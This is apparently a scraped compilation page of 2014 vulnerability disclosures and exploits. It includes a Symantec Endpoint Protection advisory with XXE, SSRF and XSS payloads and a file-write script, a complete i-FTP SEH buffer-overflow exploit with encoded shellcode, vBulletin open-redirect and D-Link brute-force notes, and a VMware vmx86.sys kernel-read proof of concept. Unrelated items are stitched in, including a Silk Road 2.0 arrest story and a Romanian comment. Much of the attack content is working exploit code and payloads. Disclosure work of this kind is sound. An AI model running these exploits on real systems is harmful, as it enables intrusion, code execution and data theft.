"#{peer} - Exploit failed, aborting.") end end end X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution

SEC Consult Vulnerability Lab Security Advisory < 20141106-0 > ======================================================================= title: XXE & XSS & Arbitrary File Write vulnerabilities product: Symantec Endpoint Protection vulnerable version: 12.1.4023.4080 fixed version: 12.1.5 (RU 5) impact: Critical CVE number: CVE-2014-3437, CVE-2014-3438, CVE-2014-3439 homepage: http://www.symantec.com found: 2014-07-01 by: Stefan Viehböck SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Symantec Endpoint Protection is a client-server solution that protects laptops, desktops, Windows and Mac computers, and servers in your network against malware. Symantec Endpoint Protection combines virus protection with advanced threat protection to proactively secure your computers against known and unknown threats. Symantec Endpoint Protection protects against malware such as viruses, worms, Trojan horses, spyware, and adware. It provides protection against even the most sophisticated attacks that evade traditional security measures, such as rootkits, zero-day attacks, and spyware that mutates. Providing low maintenance and high power, Symantec Endpoint Protection communicates over your network to automatically safeguard for both physical systems and virtual systems against attacks." Source: https://www.symantec.com/endpoint-protection https://www.symantec.com/business/support/index?page=content&id=DOC6153 Business recommendation: ------------------------ Attackers are able to perform denial-of-service attacks against the Endpoint Protection Manager which directly impacts the effectiveness of the client-side endpoint protection. Furthermore, session identifiers of users can be stolen to impersonate them and gain unauthorized access to the server. All of these attacks can have a severe impact on the security infrastructure. An update to the latest version (12.1.5 RU 5) is highly recommended. Vulnerability overview/description: ----------------------------------- 1) XML External Entity Injection (XXE) [CVE-2014-3437] Multiple XXE vulnerabilities were found in the Endpoint Protection Manager application. An attacker needs to perform MitM attacks to impersonate securityresponse.symantec.com (eg. via DNS poisoning/spoofing/hijacking, ARP spoofing, QUANTUM-style attacks, ...) to inject malicious XML code. These vulnerabilities can be used to execute server side request forgery (SSRF) attacks used for portscanning/fingerprinting, denial of service, file disclosure as well as attacks against functionality that is only exposed internally (see CVE-2013-5015 and issue #3). Note: The exploitation scenario proves that the previous command execution via SQL injection was exploitable for an external attacker with the ability to manipulate internet traffic _without any prior knowledge_ of the target system. 2) Reflected Cross-Site-Scripting (XSS) [CVE-2014-3438] Endpoint Protection Manager suffers from a reflected cross-site scripting vulnerability, which allows an attacker to steal other users' sessions, to impersonate other users and to gain unauthorized access to the admin interface. 3) Unauthenticated Arbitrary File Write/Overwrite [CVE-2014-3439] Arbitrary files can be written or overwritten by an unauthenticated attacker. The target file is truncated in the process which results in Denial of Service. However it might be possible to write files with arbitrary content nonetheless. Proof of concept: ----------------- 1) XML External Entity Injection (XXE) [CVE-2014-3437] The Symantec Protection Center component downloads XML files from http://securityresponse.symantec.com for information purposes. By impersonating securityresponse.symantec.com (eg. via DNS poisoning/spoofing/hijacking, ARP spoofing, QUANTUM-style attacks, ...) an attacker can inject malicious XML code into the file contents and thus exploit XXE vulnerabilities. For example by offering the following XML code at the URL http://securityresponse.symantec.com/avcenter/deepsightkiosk/9.xml arbitrary files can be disclosed via the Symantec Protection Center login page at https://<HOST>:8443/portal/Login.jsp =============================================================================== <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [<!ENTITY e SYSTEM 'file:///c:/windows/win.ini'> ]> <data> <regular> <text>&e;</text> </regular> <outbreak></outbreak> <threatcon>1</threatcon> </data> =============================================================================== Server Side Request Forgery (SSRF) can be exploited like in the following example that sets the application log level to "log all messages" eg. via http://securityresponse.symantec.com/avcenter/deepsightkiosk/10.xml =============================================================================== <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [<!ENTITY e SYSTEM 'http://localhost:9090/servlet/ConsoleServlet?ActionType=ConfigServer&logLevel=ALL'> ]> <foo>&e;</foo> =============================================================================== Furthermore some files can be exfiltrated to remote servers via the techniques described in: https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf 2) Reflected Cross-Site-Scripting (XSS) [CVE-2014-3438] At least the following URLs are vulnerable to XSS: https://<HOST>:8443/console/Highlander_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script> https://<HOST>:8443/portal/Loading.jsp?uri=Ij48c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0Pj9BQUFBPUJCQkIiPjxzY3JpcHQ%2bYWxlcnQoJ3hzcycpPC9zY3JpcHQ%2b 3) Unauthenticated Arbitrary File Write/Overwrite [CVE-2014-3439] A flaw in ConsoleServlet allows an attacker to specify the application server thread name via the ActionType parameter. As the thread name is used in the pattern that is passed to the java.util.logging.FileHandler constructor by the logging component (ServerLogger) an attacker can define the log file path. By causing an exception in the thread, the log file is written to disk. The following code snippet causes an exception by terminating the TCP connection before the server has finished writing the response to the socket. ActionType=/../../../../../../../../../../WINDOWS/win.ini%00 causes the win.ini file to be truncated. =============================================================================== import socket import struct HOST = '<HOST>' PORT = 9090 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) l_onoff = 1 l_linger = 0 s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,struct.pack('ii', l_onoff, l_linger)) msg = '''GET /servlet/ConsoleServlet?ActionType=/../../../../../../../../../../WINDOWS/win.ini%00 HTTP/1.1 Host: SYMEPP EvilContent: <?php evilcode(); ?> ''' s.sendall(msg) s.shutdown(socket.SHUT_RD) =============================================================================== ActionType=/../../Inetpub/Reporting/evil.php%00 causes the (empty) file evil.php to be written into the Apache webroot. ActionType=/../../Inetpub/Reporting/evil.php causes the file evil-0.log to be written into the Apache webroot. If the application log level has been set to "DEBUG" (which can be achieved via XXE, see issue #1) the file content includes all headers passed in the HTTP request (including the EvilContent header in the example above). However the file will not be processed by PHP because of the .log extension. Due to the complex nature of the Windows filesystem addressing modes (legacy/DOS, ADS, etc.) it is entirely possible that this limitation can be bypassed. Vulnerable / tested versions: ----------------------------- The vulnerabilities have been verified to exist in Symantec Endpoint Protection version 12.1.4023.4080, which was the most recent version at the time of discovery. Vendor contact timeline: ------------------------ 2014-07-11: Initial contact to secure@symantec.com 2014-07-29: Ask for status at secure@symantec.com 2014-08-01: Conference call about status, extended grace period to 2014-10-31 September/October: Several discussions / rechecks of the vulnerabilities 2014-11-06: Coordinated release of the advisory Solution: --------- 1) XML External Entity Injection (XXE) [CVE-2014-3437] Update to version 12.1.5 RU 5 2) Reflected Cross-Site-Scripting (XSS) [CVE-2014-3438] Update to version 12.1.5 RU 5 3) Unauthenticated Arbitrary File Write/Overwrite [CVE-2014-3439] The update to version 12.1.5 RU 5 only partially mitigates the vulnerability. Path Traversal is no longer possible, which reduces the severity to low/medium. The vendor claims that it will be entirely solved in the next version (12.1.5 RU6). For further information see the security advisory of the vendor: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141105_00 Workaround: ----------- See Symantec security advisory for further mitigations. Advisory URL: -------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested in working with the experts of SEC Consult? Write to career@sec-consult.com EOF Stefan Viehböck / @2014 Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities

#!/usr/bin/python #Exploit Title:i-FTP Buffer Overflow SEH #Homepage:http://www.memecode.com/iftp.php #Software Link:www.memecode.com/data/iftp-win32-v220.exe #Version:i.Ftp v2.20 (Win32 Release) #Vulnerability discovered:26.10.2014 #Description:Simple portable cross platform FTP/SFTP/HTTP client. #Tested on:Win7 32bit EN-Ultimate - Win8.1-DE 64bit - Win XPsp3-EN #Exploit Author:metacom --> twitter.com/m3tac0m import struct def little_endian(address): return struct.pack("<L",address) poc ="\x41" * 591 poc+="\xeb\x06\x90\x90" poc+=little_endian(0x1004C31F)#1004C31F 5E POP ESI poc+="\x90" * 80 # msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R #| msfencode -e x86/alpha_upper -b "\x00\x0a\x0d\x20\x22" -t c poc+=("\x89\xe7\xda\xce\xd9\x77\xf4\x58\x50\x59\x49\x49\x49\x49\x43" "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4d\x59\x35\x50" "\x53\x30\x55\x50\x43\x50\x4d\x59\x4d\x35\x46\x51\x39\x42\x55" "\x34\x4c\x4b\x51\x42\x30\x30\x4c\x4b\x51\x42\x44\x4c\x4c\x4b" "\x51\x42\x32\x34\x4c\x4b\x54\x32\x31\x38\x44\x4f\x58\x37\x30" "\x4a\x57\x56\x50\x31\x4b\x4f\x36\x51\x4f\x30\x4e\x4c\x57\x4c" "\x33\x51\x43\x4c\x44\x42\x46\x4c\x31\x30\x4f\x31\x58\x4f\x44" "\x4d\x45\x51\x38\x47\x5a\x42\x5a\x50\x31\x42\x46\x37\x4c\x4b" "\x46\x32\x42\x30\x4c\x4b\x30\x42\x47\x4c\x55\x51\x48\x50\x4c" "\x4b\x51\x50\x44\x38\x4b\x35\x39\x50\x44\x34\x30\x4a\x53\x31" "\x48\x50\x46\x30\x4c\x4b\x51\x58\x35\x48\x4c\x4b\x51\x48\x57" "\x50\x45\x51\x58\x53\x4b\x53\x47\x4c\x47\x39\x4c\x4b\x37\x44" "\x4c\x4b\x53\x31\x58\x56\x50\x31\x4b\x4f\x36\x51\x4f\x30\x4e" "\x4c\x59\x51\x58\x4f\x54\x4d\x43\x31\x39\x57\x56\x58\x4b\x50" "\x33\x45\x4b\x44\x43\x33\x43\x4d\x5a\x58\x47\x4b\x53\x4d\x31" "\x34\x52\x55\x4a\x42\x50\x58\x4c\x4b\x50\x58\x57\x54\x43\x31" "\x49\x43\x55\x36\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x45" "\x4c\x55\x51\x58\x53\x4c\x4b\x34\x44\x4c\x4b\x43\x31\x38\x50" "\x4c\x49\x30\x44\x31\x34\x57\x54\x51\x4b\x31\x4b\x53\x51\x30" "\x59\x51\x4a\x36\x31\x4b\x4f\x4b\x50\x36\x38\x51\x4f\x51\x4a" "\x4c\x4b\x55\x42\x4a\x4b\x4d\x56\x51\x4d\x42\x4a\x53\x31\x4c" "\x4d\x4b\x35\x58\x39\x33\x30\x35\x50\x33\x30\x56\x30\x33\x58" "\x30\x31\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x39\x45\x4f\x4b\x4b" "\x4e\x44\x4e\x56\x52\x5a\x4a\x53\x58\x39\x36\x4d\x45\x4f\x4d" "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x34\x46\x33\x4c\x54\x4a\x4b" "\x30\x4b\x4b\x4b\x50\x53\x45\x45\x55\x4f\x4b\x50\x47\x52\x33" "\x42\x52\x42\x4f\x42\x4a\x55\x50\x31\x43\x4b\x4f\x4e\x35\x53" "\x53\x55\x31\x32\x4c\x45\x33\x46\x4e\x52\x45\x44\x38\x52\x45" "\x55\x50\x41\x41") poc+="\x90" * (20000 - len(poc)) header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22" header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a\x09\x3c\x45\x76\x65\x6e\x74\x20\x55" header += "\x72\x6c\x3d\x22\x22\x20\x54\x69\x6d\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x0a" + poc footer = "\x22\x20\x46\x6f\x6c\x64\x65\x72\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a" exploit = header + footer filename = "Schedule.xml" file = open(filename , "w") file.write(exploit) print "\n[*]Vulnerable Created Schedule.xml!" print "[*]Copy Schedule.xml to C:\Program Files\Memecode\i.Ftp" print "[*]Start IFTP" print "[*]----------------------------------------------------" file.close() print ''' [+]Second Vulnerability [-]You can also enter the contents 20000 A of the file in the --> * HTTP -> HTTP Download --> Option "FILE" to cause this crash * Access violation - code c0000005 (!!! second chance !!!) * 0:003> !exchain * 016fff2c: 41414141 * Invalid exception stack at 41414141''' http://www.exploit-db.com/exploits/35177/

The authorities of the U.S. Federal Bureau of Investigation have announced that they have arrested "Silk Road 2.0" operator Blake Benthall, used the alias "Defcon" in California on Wednesday and charged him with conspiracy to commit drug trafficking, computer hacking, money laundering and other crimes. Silk Road 2, an alternative to the notorious online illegal-drug marketplace that went dark in October of 2013, has been seized in a joint action involving the FBI, Department of Homeland Security, and European law enforcement. The arrest comes almost a year after the arrest of a San Francisco man Ross William Ulbricht, also known as "Dread Pirate Roberts," — the alleged founder of the dark Web online drug bazaar "Silk Road" that generated $8 million in monthly sales and attracted 150,000 vendors and customers. At that time, FBI seized the notorious site, but the very next month, a nearly identical site, Silk Road 2.0, opened for business. The Feds and the US Department of Justice claim 26-year-old Blake Benthall launched the notorious Silk Road 2.0 on Nov. 6, 2013, five weeks after the shutdown of the original Silk Road website and arrest of its alleged operator. Benthall appeared Thursday afternoon in federal court before Magistrate Judge Jaqueline Scott Corley, where Assistant US Attorney Kathryn Haun told the judge that Benthall is a "severe flight risk," according to the San Francisco Chronicle. Benthall is charged with conspiring to commit narcotics trafficking, conspiring to commit computer hacking, conspiring to traffic in fraudulent identification documents and money laundering. If convicted, he could be sentenced to life in prison. Silk Road 2.0 operated much the same way as its predecessor did, it sold illegal goods and services on the Tor network and generates millions of dollars each month. As of September 2014, Benthall allegedly processed $8 Million in monthly sales, according to the FBI. In order to maintain the the anonymity of buyers and sellers, Silk Road 2.0 offers transactions to be made entirely in Bitcoin, as well as accessed through The Onion Router, or TOR, which conceals Internet Protocol (IP) addresses enabling users to hide their identities and locations. According to the FBI, it bought 1 kilogram of heroin, 5 kilograms of cocaine, and 10 grams of LSD from Silk Road 2.0, apparently from Benthall himself. "Silk Road 2.0 had over 13,000 listings for controlled substances, including, among others, 1,783 listings for 'Psychedelics,' 1,697 listings for'“Ecstasy,' 1,707 listings for 'Cannabis,' and 379 listings for 'Opioids,'." Surs?: http://thehackernews.com/2014/11/fbi-seize-silk-road-20-servers-admin.html

Nu prea are rost s? mai c?uta?i prin AT&T, deoarece nu ofer? la to?i bani. Te po?i alege doar cu un loc în Hall of Fame. Succes.

# URL Open Redirect on vBulletin # Risk: Low # CWE number: CWE-601 # Version: 4.2.1 # Date: 29/10/2014 # Author: Felipe " Renzi " Gabriel # Contact: renzi@linuxmail.org # Tested on Windows 8 pro # Vulnerable File: go.php # Exploit: [+] http://host.com/go.php?url=http://site.com # PoC: [+] http://vb.bdr1.net/go.php?url=http://www.google.com Wait 30 seconds, and you will be redirect... # Note: Open redirect (CWE-601) allows phishing attack to be more effective. Redirection is commonly used within all web applications for various purposes.("Jason Lam" ~ Top 25 Series - Rank 23 - Open Redirect) # Reference: http://software-security.sans.org # Thank's Source: vBulletin 4.2.1 Open Redirect ? Packet Storm

Hello list! There are Abuse of Functionality, Brute Force and Cross-Site Request Forgery vulnerabilities in D-Link DAP-1360 (Wi-Fi Access Point and Router). ------------------------- Affected products: ------------------------- Vulnerable is the next model: D-Link DAP-1360, Firmware 1.0.0. This model with other firmware versions also must be vulnerable. D-Link will fix these vulnerabilities in the next version of firmware (will be released in November), as they answered me in October. Except minor vulnerability - Abuse of Functionality. ---------- Details: ---------- Abuse of Functionality (WASC-42): Login is persistent: admin. Which simplify Brute Force attack. Brute Force (WASC-11): In login form http://192.168.0.50 there is no protection against Brute Force attacks. Which allows to pick up password (if it was changed from default), particularly at local attack. E.g. via LAN malicious users or virus at some computer can conduct attack for picking up the password, if it was changed. For attacks it's needed to send POST request with cookie with login and password: Cookie: cookie_lang=ukr; client_login=admin; client_password=1 Cross-Site Request Forgery (WASC-09): Lack of protection against Brute Force (such as captcha) also leads to possibility of conducting of CSRF attacks, which I wrote about in the article Attacks on unprotected login forms (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html). It allows to conduct remote login. Which will be in handy at conducting of attacks on different CSRF and XSS vulnerabilities in control panel. For attacks it's needed to send POST request with cookie with login and password (e.g. it can be set using Flash or other plugins): Cookie: cookie_lang=ukr; client_login=admin; client_password=1 There are many CSRF vulnerabilities inside admin panel and I'll write about them in the next advisory ------------ Timeline: ------------ 2014.05.08 - announced at my site. 2014.05.22 - informed developer about multiple vulnerabilities. 2014.07.12 - disclosed at my site (http://websecurity.com.ua/7168/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua Source: D-Link DAP-1360 Abuse / Cross Site Request Forgery ? Packet Storm

Title: VMWare vmx86.sys Arbitrary Kernel Read Advisory ID: KL-001-2014-004 Publication Date: 2014.11.04 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-004.txt 1. Vulnerability Details Affected Vendor: VMWare Affected Product: Workstation Affected Version: 10.0.0.40273 Platform: Microsoft Windows XP SP3 x86, Microsoft Windows Server 2003 SP2 x86, Microsoft Windows 7 SP1 x86 CWE Classification: CWE-20: Improper Input Validation Impact: Arbitrary Read, Denial-of-Service Attack vector: IOCTL 2. Vulnerability Description A vulnerability within the vmx86 driver allows an attacker to specify a memory address within the kernel and have the memory stored at that address be returned to the attacker. 3. Technical Description The first four bytes of the InputBuffer parameter passed to DeviceIoControl is used as the source parameter in a memcpy call. The InputBuffer must be a minimum of eight bytes long in order to trigger the vulnerability. The OutputBuffer parameter passed to DeviceIoControl is used as the destination address for the output from the DeviceIoControl call. In this case, the data returned is the same data residing at the source paramter of memcpy. This can therefore be abused in a way that allows an attacker to arbitrarily define a kernel address, and have the memory stored at that address be returned to the attacker at an address residing in userland. Probably caused by : vmx86.sys ( vmx86+bd6 ) Followup: MachineOwner --------- kd> .symfix;.reload;!analyze -v Loading Kernel Symbols ............................................................... ................................................................ ................................................... Loading User Symbols ......................... Loading unloaded module list ..... ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except, it must be protected by a Probe. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: ffff0000, memory referenced. Arg2: 00000000, value 0 = read operation, 1 = write operation. Arg3: 82c727f3, If non-zero, the instruction address which referenced the bad memory address. Arg4: 00000000, (reserved) Debugging Details: ------------------ READ_ADDRESS: ffff0000 FAULTING_IP: nt!memcpy+33 82c727f3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] MM_INTERNAL_CODE: 0 DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT BUGCHECK_STR: 0x50 PROCESS_NAME: python.exe CURRENT_IRQL: 0 ANALYSIS_VERSION: 6.3.9600.16384 (debuggers(dbg).130821-1623) x86fre TRAP_FRAME: 822e47dc -- (.trap 0xffffffff822e47dc) ErrCode = 00000000 eax=ffff2000 ebx=87433558 ecx=00000800 edx=00000000 esi=ffff0000 edi=856a9000 eip=82c727f3 esp=822e4850 ebp=822e4858 iopl=0 nv up ei pl nz ac po nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010212 nt!memcpy+0x33: 82c727f3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] Resetting default scope LAST_CONTROL_TRANSFER: from 82c7a3d8 to 82cc741b STACK_TEXT: 822e47c4 82c7a3d8 00000000 ffff0000 00000000 nt!MmAccessFault+0x106 822e47c4 82c727f3 00000000 ffff0000 00000000 nt!KiTrap0E+0xdc 822e4858 93572bd6 856a9000 ffff0000 00002000 nt!memcpy+0x33 822e48cc 9357329a 856a9000 00000008 856a9000 vmx86+0xbd6 822e48f8 82c70593 86f0d030 87433540 87433540 vmx86+0x129a 822e4910 82e6499f 871f8b08 87433540 874335b0 nt!IofCallDriver+0x63 822e4930 82e67b71 86f0d030 871f8b08 00000000 nt!IopSynchronousServiceTail+0x1f8 822e49cc 82eae3f4 86f0d030 87433540 00000000 nt!IopXxxControlFile+0x6aa 822e4a00 821210fa 0000007c 00000000 00000000 nt!NtDeviceIoControlFile+0x2a 822e4b14 82cb7685 00000000 00000000 00000000 nt!KiDeliverApc+0x17f 822e4b58 82cb64f7 00000000 85689a10 80000000 nt!KiSwapThread+0x24e 822e4b80 82cb61d5 85689a10 85689ad0 0000008a nt!KiCommitThreadWait+0x1df 822e4bd8 82e639fd 01b1fd01 00000001 822e4bc8 nt!KeDelayExecutionThread+0x2aa 822e4c24 82c771ea 00000001 01b1ff54 01b1ff78 nt!NtDelayExecution+0x8d 822e4c24 777c70b4 00000001 01b1ff54 01b1ff78 nt!KiFastCallEntry+0x12a 01b1ff0c 777c57d4 75a31876 00000001 01b1ff54 ntdll!KiFastSystemCallRet 01b1ff10 75a31876 00000001 01b1ff54 da57de5e ntdll!NtDelayExecution+0xc 01b1ff78 00401ed6 ffffffff 00000001 01b1ff94 KERNELBASE!SleepEx+0x65 01b1ff94 777e37f5 00000000 762fe46a 00000000 kernel32!BaseThreadInitThunk+0xe 01b1ffd4 777e37c8 00401ec0 00000000 00000000 ntdll!__RtlUserThreadStart+0x70 01b1ffec 00000000 00401ec0 00000000 00000000 ntdll!_RtlUserThreadStart+0x1b STACK_COMMAND: kb FOLLOWUP_IP: vmx86+bd6 93572bd6 83c40c add esp,0Ch SYMBOL_STACK_INDEX: 3 SYMBOL_NAME: vmx86+bd6 FOLLOWUP_NAME: MachineOwner MODULE_NAME: vmx86 IMAGE_NAME: vmx86.sys DEBUG_FLR_IMAGE_TIMESTAMP: 539a4f4e FAILURE_BUCKET_ID: 0x50_vmx86+bd6 BUCKET_ID: 0x50_vmx86+bd6 ANALYSIS_SOURCE: KM FAILURE_ID_HASH_STRING: km:0x50_vmx86+bd6 FAILURE_ID_HASH: {fc58ae86-f23c-59c4-2a6e-428433bd6080} Followup: MachineOwner --------- kd> .frame /c 04; .cxr; .frame /c 03; .cxr; .frame /c 02 04 822e48f8 82c70593 vmx86+0x129a eax=ffff2000 ebx=87433558 ecx=00000800 edx=00000000 esi=ffff0000 edi=856a9000 eip=9357329a esp=822e48d4 ebp=822e48f8 iopl=0 nv up ei pl nz ac po nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010212 vmx86+0x129a: 9357329a eb63 jmp vmx86+0x12ff (935732ff) Resetting default scope 03 822e48cc 9357329a vmx86+0xbd6 eax=ffff2000 ebx=87433558 ecx=00000800 edx=00000000 esi=ffff0000 edi=856a9000 eip=93572bd6 esp=822e4860 ebp=822e48cc iopl=0 nv up ei pl nz ac po nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010212 vmx86+0xbd6: 93572bd6 83c40c add esp,0Ch Resetting default scope 02 822e4858 93572bd6 nt!memcpy+0x33 eax=ffff2000 ebx=87433558 ecx=00000800 edx=00000000 esi=ffff0000 edi=856a9000 eip=82c727f3 esp=822e4850 ebp=822e4858 iopl=0 nv up ei pl nz ac po nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010212 nt!memcpy+0x33: 82c727f3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] By using the provided proof-of-concept code, an attacker can read data from arbitrary kernel memory addresses. As an example, the value of the first entry in HalDispatchTable is read. Below is the debugger output, followed by the stdout from the proof-of-concept code. 0:000> g ModLoad: 76170000 7618f000 C:\Windows\system32\IMM32.DLL ModLoad: 77600000 776cc000 C:\Windows\system32\MSCTF.dll ModLoad: 1d1a0000 1d1b8000 C:\Python27\DLLs\_ctypes.pyd ModLoad: 77440000 7759c000 C:\Windows\system32\ole32.dll ModLoad: 75c60000 75cef000 C:\Windows\system32\OLEAUT32.dll ModLoad: 77950000 77955000 C:\Windows\system32\Psapi.DLL ModLoad: 01980000 01d92000 C:\Windows\system32\ntkrnlpa.exe *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\kernel32.dll - eax=00000000 ebx=00000000 ecx=0021fe68 edx=00000020 esi=778e7380 edi=778e7340 eip=778570b4 esp=0021feb8 ebp=0021fed4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 ntdll!KiFastSystemCallRet: 778570b4 c3 ret 0:000> db 0x25 L?0x4 00000025 a2 68 04 83 [+] Handle \\.\vmx86 @ 120 [+] HalDispatchTable+0x4(0x82d383fc) == 830468a2 4. Mitigation and Remediation Recommendation A patch is not likely to be forthcoming from the vendor. It is recommended not to allow users access to the __vmware__ group unless they are trusted with LocalSystem privileges. 5. Credit This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc. 6. Disclosure Timeline 2014.08.08 - Initial contact; sent VMWare report and PoC. 2014.08.08 - VMWare acknowledges receipt of vulnerability report. 2014.08.15 - VMWare asks for clarification on the PoC. 2014.08.18 - KoreLogic responds to VMWare's request. 2014.08.18 - VMWare counters that it is the expected behavior for members of the __vmware__ group to be able to read arbitrary memory. Asks KoreLogic to describe the "actionable security item here." 2014.08.20 - KoreLogic advises VMWare that providing non-admin user accounts with the unmitigated ability to dump the contents of the kernel memory is a security risk. 2014.08.20 - VMWare suggests modifying the documentation describing the capabilities of the __vmware__ group as a solution. 2014.08.21 - KoreLogic provides VMWare with a mitigation strategy and describes how to patch the vulnerability. KoreLogic requests that a CVE be issued. 2014.08.25 - VMware states they will continue to review the vulnerability details. 2014.09.24 - KoreLogic informs VMWare that 30 business days have passed since vendor acknowledgement of the initial report. KoreLogic requests CVE number for the vulnerability, if there is one. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date. 2014.09.26 - VMWare responds that they will contact KoreLogic "next week." 2014.10.08 - KoreLogic reaches out to VMWare as more than 1 week has elapsed since the last response. 2014.10.13 - VMWare responds that they have decided the reported vulnerability is not a security issue. VMWare creates a Knowledge Base article comparing the __vmware__ group to a Microsoft Windows Power User account. 2014.10.14 - 45 business days have elapsed since the vulnerability was reported to VMWare. 2014.10.14 - KoreLogic requests a CVE for this vulnerability report. 2014.10.22 - MITRE asks KoreLogic to clarify the vendor's response to the KoreLogic report. 2014.10.22 - KoreLogic responds with a summary of VMWare's responses to the KoreLogic report. 2014.10.22 - MITRE responds that there will be no CVE issued for this report, as the vendor is "entitled to define a security policy in which this read access is considered an acceptable risk." 2014.11.04 - Public disclosure. 7. Proof of Concept The code presented below will trigger the issue by forcing memory to be read from a blatantly invalid address of 0xffff0000. #!/usr/bin/python2 # # KL-001-2014-004 : VMWare vmx86.sys Arbitrary Kernel Read # Matt Bergin (KoreLogic / Smash the Stack) from ctypes import * from struct import pack from os import getpid,system from sys import exit from binascii import hexlify from re import findall EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA GetProcAddress,DeviceIoControlFile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.kernel32.CloseHandle VirtualProtect,ReadProcessMemory = windll.kernel32.VirtualProtect,windll.kernel32.ReadProcessMemory INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0 handle = CreateFileA("\\\\.\\vmx86",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) if (handle == -1): print "[!] Could not open handle, is user part of the __vmware__ group?" exit(1) print "[+] Handle \\\\.\\vmx86 @ %s" % (handle) NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0x100)),0x1000|0x2000,0x40) buf = pack('<L',0xcccccccc)*100 WriteProcessMemory(-1,0x100,buf,len(buf),byref(c_int(0))) inputBuffer = pack('<L',0xffff0000) + pack('<L',0x41414141) DeviceIoControlFile(handle,0,0,0,byref(c_ulong(8)),0x81014008,inputBuffer,len(inputBuffer),0x75,0xff) if (GetLastError() != 0): print "[!] caught an error while executing the IOCTL - %s." % (hex(GetLastError())) exit(1) CloseHandle(handle) The contents of this advisory are copyright(c) 2014 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt Source: VMWare vmx86.sys Arbitrary Kernel Read ? Packet Storm

